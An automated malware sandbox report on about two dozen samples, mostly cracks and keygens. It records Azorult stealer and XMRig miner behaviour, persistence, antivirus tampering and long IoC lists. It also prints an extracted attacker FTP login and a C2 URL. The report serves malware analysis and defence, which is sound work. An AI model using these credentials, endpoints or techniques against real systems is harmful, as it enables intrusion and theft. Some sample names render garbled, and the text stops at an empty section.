Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
4ฺฺฺK...ฺฺ
windows10_x64
7ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
3Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1802s -
max time network
1804s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 14:18
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll acprotect C:\ProgramData\Windows\vp8encoder.dll acprotect -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\WindowsTask\MicrosoftHost.exe xmrig C:\ProgramData\WindowsTask\MicrosoftHost.exe xmrig -
Processes:
resource yara_rule C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
Processes:
taskhost.exeLtHv0O2KZDK4M637.bin.execmd.exedescription ioc process File created C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe File opened for modification C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe File opened for modification C:\Windows\System32\drivers\etc\hosts LtHv0O2KZDK4M637.bin.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 20 IoCs
Processes:
wini.exewinit.exerutserv.exerutserv.exerutserv.exesys.exerutserv.exerfusclient.exerfusclient.exerfusclient.execheat.exetaskhost.exetaskhostw.exewinlogon.exeR8.exeRar.exeRDPWInst.exeRDPWInst.exeaudiodg.exeMicrosoftHost.exepid process 3460 wini.exe 804 winit.exe 1188 rutserv.exe 1392 rutserv.exe 1604 rutserv.exe 1728 sys.exe 2012 rutserv.exe 4300 rfusclient.exe 2088 rfusclient.exe 2024 rfusclient.exe 3720 cheat.exe 3108 taskhost.exe 3952 taskhostw.exe 1140 winlogon.exe 836 R8.exe 4588 Rar.exe 1044 RDPWInst.exe 832 RDPWInst.exe 5388 audiodg.exe 5536 MicrosoftHost.exe -
Modifies Windows Firewall 1 TTPs
-
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll upx C:\ProgramData\Windows\vp8encoder.dll upx C:\ProgramData\WindowsTask\winlogon.exe upx C:\Programdata\WindowsTask\winlogon.exe upx -
Loads dropped DLL 5 IoCs
Processes:
sys.exesvchost.exepid process 1728 sys.exe 1728 sys.exe 1728 sys.exe 1728 sys.exe 1872 svchost.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 5488 icacls.exe 5984 icacls.exe 5528 icacls.exe 5484 icacls.exe 4992 icacls.exe 5468 icacls.exe 5392 icacls.exe 3908 icacls.exe 5948 icacls.exe 6072 icacls.exe 5736 icacls.exe 4736 icacls.exe 5432 icacls.exe 5280 icacls.exe 2192 icacls.exe 6020 icacls.exe 5348 icacls.exe 5708 icacls.exe 5784 icacls.exe 5620 icacls.exe 4600 icacls.exe 5816 icacls.exe 4620 icacls.exe 3456 icacls.exe 1520 icacls.exe 748 icacls.exe 4052 icacls.exe 5860 icacls.exe 2212 icacls.exe 2524 icacls.exe 1568 icacls.exe 5360 icacls.exe 5452 icacls.exe 4772 icacls.exe 5640 icacls.exe 6044 icacls.exe 5268 icacls.exe 5312 icacls.exe 6092 icacls.exe 5856 icacls.exe 5992 icacls.exe 212 icacls.exe 3096 icacls.exe 5592 icacls.exe 5864 icacls.exe 5292 icacls.exe 5612 icacls.exe 4548 icacls.exe 2884 icacls.exe 5524 icacls.exe 5236 icacls.exe 5376 icacls.exe 5396 icacls.exe 5684 icacls.exe 6088 icacls.exe 5544 icacls.exe 4196 icacls.exe 5888 icacls.exe 5420 icacls.exe 3176 icacls.exe 436 icacls.exe 5716 icacls.exe 5324 icacls.exe 6052 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
LtHv0O2KZDK4M637.bin.exetaskhostw.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" LtHv0O2KZDK4M637.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run LtHv0O2KZDK4M637.bin.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
LtHv0O2KZDK4M637.bin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.bin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
LtHv0O2KZDK4M637.bin.exeRDPWInst.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops file in Program Files directory 31 IoCs
Processes:
taskhost.exeRDPWInst.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft JDX taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\Common Files\System\iediagcmd.exe taskhost.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files\AVAST Software\Avast attrib.exe File created C:\Program Files\Common Files\System\iexplore.exe taskhost.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files (x86)\Zaxar taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files\360\Total Security attrib.exe File opened for modification C:\Program Files\ESET attrib.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File opened for modification C:\Program Files\Malwarebytes\Anti-Malware attrib.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files\ByteFence taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
taskhost.exeattrib.exedescription ioc process File created C:\Windows\java.exe taskhost.exe File opened for modification C:\Windows\java.exe taskhost.exe File opened for modification C:\WINDOWS\McMwt attrib.exe File created C:\Windows\boy.exe taskhost.exe File opened for modification C:\Windows\boy.exe taskhost.exe File created C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\NetworkDistribution taskhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
spoolsv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID spoolsv.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
sys.exewinit.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sys.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sys.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 668 timeout.exe 3868 timeout.exe 4520 timeout.exe 6112 timeout.exe 5448 timeout.exe 992 timeout.exe 3128 timeout.exe 3572 timeout.exe 4764 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 3424 ipconfig.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5964 taskkill.exe 6016 taskkill.exe 5772 taskkill.exe 2304 taskkill.exe 2856 taskkill.exe 1976 taskkill.exe -
Modifies data under HKEY_USERS 18 IoCs
Processes:
spoolsv.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe -
Modifies registry class 6 IoCs
Processes:
winit.exeR8.execmd.exewini.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings wini.exe -
NTFS ADS 2 IoCs
Processes:
taskhostw.exeLtHv0O2KZDK4M637.bin.exedescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ LtHv0O2KZDK4M637.bin.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 3164 regedit.exe 576 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
LtHv0O2KZDK4M637.bin.exerutserv.exerutserv.exepid process 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 1188 rutserv.exe 1188 rutserv.exe 1188 rutserv.exe 1188 rutserv.exe 1188 rutserv.exe 1188 rutserv.exe 1392 rutserv.exe 1392 rutserv.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe 4640 LtHv0O2KZDK4M637.bin.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskhostw.exepid process 3952 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 644 644 644 -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 2024 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.bin.exetaskkill.exetaskkill.exetaskkill.exeRDPWInst.exedescription pid process Token: SeDebugPrivilege 1188 rutserv.exe Token: SeDebugPrivilege 1604 rutserv.exe Token: SeTakeOwnershipPrivilege 2012 rutserv.exe Token: SeTcbPrivilege 2012 rutserv.exe Token: SeTcbPrivilege 2012 rutserv.exe Token: SeDebugPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: 81688264704 4640 LtHv0O2KZDK4M637.bin.exe Token: SeDebugPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: 9800843241661309221 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801140109730688463 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801171995562585508 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801174194589380002 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801192886296161631 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801234667747585225 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801253359445978362 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801256657976208525 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801263255044533407 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801264354556357784 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801274250163301565 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801280847244209231 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801283046267333717 4640 LtHv0O2KZDK4M637.bin.exe Token: 9801306136007257098 4640 LtHv0O2KZDK4M637.bin.exe Token: 274877907072 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: 8401202115422191618 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeCreateTokenPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: SeTakeOwnershipPrivilege 4640 LtHv0O2KZDK4M637.bin.exe Token: 30732044 4640 LtHv0O2KZDK4M637.bin.exe Token: 9920249032593053928 4640 LtHv0O2KZDK4M637.bin.exe Token: 345961954437014784 4640 LtHv0O2KZDK4M637.bin.exe Token: 1080863910568919553 4640 LtHv0O2KZDK4M637.bin.exe Token: 281477286448623 4640 LtHv0O2KZDK4M637.bin.exe Token: 17596481011712 4640 LtHv0O2KZDK4M637.bin.exe Token: 4096 4640 LtHv0O2KZDK4M637.bin.exe Token: 12884901888 4640 LtHv0O2KZDK4M637.bin.exe Token: 8331610485447196672 4640 LtHv0O2KZDK4M637.bin.exe Token: 34393294800 4640 LtHv0O2KZDK4M637.bin.exe Token: 8541987889788697802 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: 51539607552 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: 8589934592 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: 120259084316 4640 LtHv0O2KZDK4M637.bin.exe Token: 0 4640 LtHv0O2KZDK4M637.bin.exe Token: SeDebugPrivilege 2304 taskkill.exe Token: SeDebugPrivilege 2856 taskkill.exe Token: SeDebugPrivilege 1976 taskkill.exe Token: SeDebugPrivilege 1044 RDPWInst.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
